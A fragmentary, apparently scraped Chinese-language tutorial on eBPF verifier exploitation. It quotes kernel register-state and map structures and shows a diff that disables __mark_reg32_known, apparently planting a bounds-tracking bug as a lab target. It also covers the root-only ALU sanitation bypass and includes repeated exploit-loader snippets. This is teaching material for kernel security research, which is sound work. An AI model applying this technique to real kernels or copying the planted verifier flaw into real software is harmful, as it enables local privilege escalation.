structbpf_reg_state { /* Ordering of fields matters. See states_equal() */ enumbpf_reg_typetype; /* Fixed part of pointer offset, pointer types only */ s32 off; union { /* valid when type == PTR_TO_PACKET */ int range;
/* valid when type == CONST_PTR_TO_MAP | PTR_TO_MAP_VALUE | * PTR_TO_MAP_VALUE_OR_NULL */ struct { structbpf_map *map_ptr; /* To distinguish map lookups from outer map * the map_uid is non-zero for registers * pointing to inner maps. */ u32 map_uid; };
u32 mem_size; /* for PTR_TO_MEM | PTR_TO_MEM_OR_NULL */
/* Max size from any of the above. */ struct { unsignedlong raw1; unsignedlong raw2; } raw;
u32 subprogno; /* for PTR_TO_FUNC */ }; /* For PTR_TO_PACKET, used to find other pointers with the same variable * offset, so they can share range knowledge. * For PTR_TO_MAP_VALUE_OR_NULL this is used to share which map value we * came from, when one is tested for != NULL. * For PTR_TO_MEM_OR_NULL this is used to identify memory allocation * for the purpose of tracking that it's freed. * For PTR_TO_SOCKET this is used to share which pointers retain the * same reference to the socket, to determine proper reference freeing. */ u32 id; /* PTR_TO_SOCKET and PTR_TO_TCP_SOCK could be a ptr returned * from a pointer-cast helper, bpf_sk_fullsock() and * bpf_tcp_sock(). * * Consider the following where "sk" is a reference counted * pointer returned from "sk = bpf_sk_lookup_tcp();": * * 1: sk = bpf_sk_lookup_tcp(); * 2: if (!sk) { return 0; } * 3: fullsock = bpf_sk_fullsock(sk); * 4: if (!fullsock) { bpf_sk_release(sk); return 0; } * 5: tp = bpf_tcp_sock(fullsock); * 6: if (!tp) { bpf_sk_release(sk); return 0; } * 7: bpf_sk_release(sk); * 8: snd_cwnd = tp->snd_cwnd; // verifier will complain * * After bpf_sk_release(sk) at line 7, both "fullsock" ptr and * "tp" ptr should be invalidated also. In order to do that, * the reg holding "fullsock" and "sk" need to remember * the original refcounted ptr id (i.e. sk_reg->id) in ref_obj_id * such that the verifier can reset all regs which have * ref_obj_id matching the sk_reg->id. * * sk_reg->ref_obj_id is set to sk_reg->id at line 1. * sk_reg->id will stay as NULL-marking purpose only. * After NULL-marking is done, sk_reg->id can be reset to 0. * * After "fullsock = bpf_sk_fullsock(sk);" at line 3, * fullsock_reg->ref_obj_id is set to sk_reg->ref_obj_id. * * After "tp = bpf_tcp_sock(fullsock);" at line 5, * tp_reg->ref_obj_id is set to fullsock_reg->ref_obj_id * which is the same as sk_reg->ref_obj_id. * * From the verifier perspective, if sk, fullsock and tp * are not NULL, they are the same ptr with different * reg->type. In particular, bpf_sk_release(tp) is also * allowed and has the same effect as bpf_sk_release(sk). */ u32 ref_obj_id; /* For scalar types (SCALAR_VALUE), this represents our knowledge of * the actual value. * For pointer types, this represents the variable part of the offset * from the pointed-to object, and is shared with all bpf_reg_states * with the same id as us. */ structtnumvar_off; /* Used to determine if any memory access using this register will * result in a bad access. * These refer to the same value as var_off, not necessarily the actual * contents of the register. */ s64 smin_value; /* minimum possible (s64)value */ s64 smax_value; /* maximum possible (s64)value */ u64 umin_value; /* minimum possible (u64)value */ u64 umax_value; /* maximum possible (u64)value */ s32 s32_min_value; /* minimum possible (s32)value */ s32 s32_max_value; /* maximum possible (s32)value */ u32 u32_min_value; /* minimum possible (u32)value */ u32 u32_max_value; /* maximum possible (u32)value */ /* parentage chain for liveness checking */ structbpf_reg_state *parent; /* Inside the callee two registers can be both PTR_TO_STACK like * R1=fp-8 and R2=fp-8, but one of them points to this function stack * while another to the caller's stack. To differentiate them 'frameno' * is used which is an index in bpf_verifier_state->frame[] array * pointing to bpf_func_state. */ u32 frameno; /* Tracks subreg definition. The stored value is the insn_idx of the * writing insn. This is safe because subreg_def is used before any insn * patching which only happens after main verification finished. */ s32 subreg_def; enumbpf_reg_livenesslive; /* if (!precise && SCALAR_VALUE) min/max/tnum don't affect safety */ bool precise; };
7957c7957,7958 < __mark_reg32_known(dst_reg, var32_off.value); --- > // `scalar_min_max_or` will handler the case > //__mark_reg32_known(dst_reg, var32_off.value);
/* Calculate sign/unsigned bounds and tnum for alu32 and alu64 bit ops. * There are two classes of instructions: The first class we track both * alu32 and alu64 sign/unsigned bounds independently this provides the * greatest amount of precision when alu operations are mixed with jmp32 * operations. These operations are BPF_ADD, BPF_SUB, BPF_MUL, BPF_ADD, * and BPF_OR. This is possible because these ops have fairly easy to * understand and calculate behavior in both 32-bit and 64-bit alu ops. * See alu32 verifier tests for examples. The second class of * operations, BPF_LSH, BPF_RSH, and BPF_ARSH, however are not so easy * with regards to tracking sign/unsigned bounds because the bits may * cross subreg boundaries in the alu64 case. When this happens we mark * the reg unbounded in the subreg bound space and use the resulting * tnum to calculate an approximation of the sign/unsigned bounds. */
该函数实现了 ALU 操作后目标寄存器的范围跟踪。
首先,目标寄存器 var_off 被更新为 tnum_or。 实现方法很简单:如果要 OR 的两个比特都是未知的,那么结果也是未知的。 即使其中一个位是未知的,掩码中的相应位也会被设置为0,因为如果另一个位是1的话,OR 的结果总是1:
/* Mark the unknown part of a register (variable offset or scalar value) as * known to have the value @imm. */ staticvoid __mark_reg_known(struct bpf_reg_state *reg, u64 imm) { /* Clear id, off, and union(map_ptr, range) */ memset(((u8 *)reg) + sizeof(reg->type), 0, offsetof(struct bpf_reg_state, var_off) - sizeof(reg->type)); ___mark_reg_known(reg, imm); }
换句话说,如果执行 OR 运算的两个 64 位寄存器都是常数,就不需要在 scalar32_min_max_or 中调用__mark_reg32_known,随后的 scalar_min_max_or 会使它们成为常数,不会有问题。
/* We get our maximum from the var_off, and our minimum is the * maximum of the operands' minima */ dst_reg->umin_value = max(dst_reg->umin_value, umin_val); dst_reg->umax_value = dst_reg->var_off.value | dst_reg->var_off.mask; if (dst_reg->smin_value < 0 || smin_val < 0) { /* Lose signed bounds when ORing negative numbers, * ain't nobody got time for that. */ dst_reg->smin_value = S64_MIN; dst_reg->smax_value = S64_MAX; } else { /* ORing two positives gives a positive, so safe to * cast result into s64. */ dst_reg->smin_value = dst_reg->umin_value; dst_reg->smax_value = dst_reg->umax_value; } /* We may learn something more from the var_off */ __update_reg_bounds(dst_reg);
int progfd = bpf(BPF_PROG_LOAD, &prog_attr); if (progfd == -1) fatal("[-] bpf(BPF_PROG_LOAD)");
int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) fatal("socketpair"); if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) fatal("setsockopt");
write(socks[1], "Hello", 5);
printf("%s\n", verifier_log);
val = 0; map_lookup(mapfd, 0, &val); printf("0x%lx\n", val);
structbpf_map { /* The first two cachelines with read-mostly members of which some * are also accessed in fast-path (e.g. ops, max_entries). */ conststructbpf_map_ops *ops ____cacheline_aligned; structbpf_map *inner_map_meta; #ifdef CONFIG_SECURITY void *security; #endif enumbpf_map_typemap_type; u32 key_size; u32 value_size; u32 max_entries; u64 map_extra; /* any per-map-type extra fields */ u32 map_flags; int spin_lock_off; /* >=0 valid offset, <0 error */ int timer_off; /* >=0 valid offset, <0 error */ u32 id; int numa_node; u32 btf_key_type_id; u32 btf_value_type_id; u32 btf_vmlinux_value_type_id; structbtf *btf; #ifdef CONFIG_MEMCG_KMEM structmem_cgroup *memcg; #endif char name[BPF_OBJ_NAME_LEN]; bool bypass_spec_v1; bool frozen; /* write-once; write-protected by freeze_mutex */ /* 14 bytes hole */
/* The 3rd and 4th cacheline with misc members to avoid false sharing * particularly with refcounting. */ atomic64_t refcnt ____cacheline_aligned; atomic64_t usercnt; structwork_structwork; structmutexfreeze_mutex; atomic64_t writecnt; /* 'Ownership' of program-containing map is claimed by the first program * that is going to use this map or by the first program which FD is * stored in the map to make sure that all callers and callees have the * same prog type, JITed flag and xdp_has_frags flag. */ struct { spinlock_t lock; enumbpf_prog_typetype; bool jited; bool xdp_has_frags; } owner; };
root 测试 oob
正如前文提到的,ALU sanitation 的缓解机制使得不能像以前那样简单的 oob 利用。
事实上如果函数 bpf_bypass_spec_v1 函数返回 true,则会绕过 ALU sanitation。这个函数对 root 权限返回真,所以你仍然可以用 root 权限尝试超出范围的引用。
int progfd = bpf(BPF_PROG_LOAD, &prog_attr); if (progfd == -1) fatal("[-] bpf(BPF_PROG_LOAD)");
int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) fatal("socketpair"); if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) fatal("setsockopt");
int progfd = bpf(BPF_PROG_LOAD, &prog_attr); if (progfd == -1) fatal("[-] bpf(BPF_PROG_LOAD)");
int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) fatal("socketpair"); if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) fatal("setsockopt");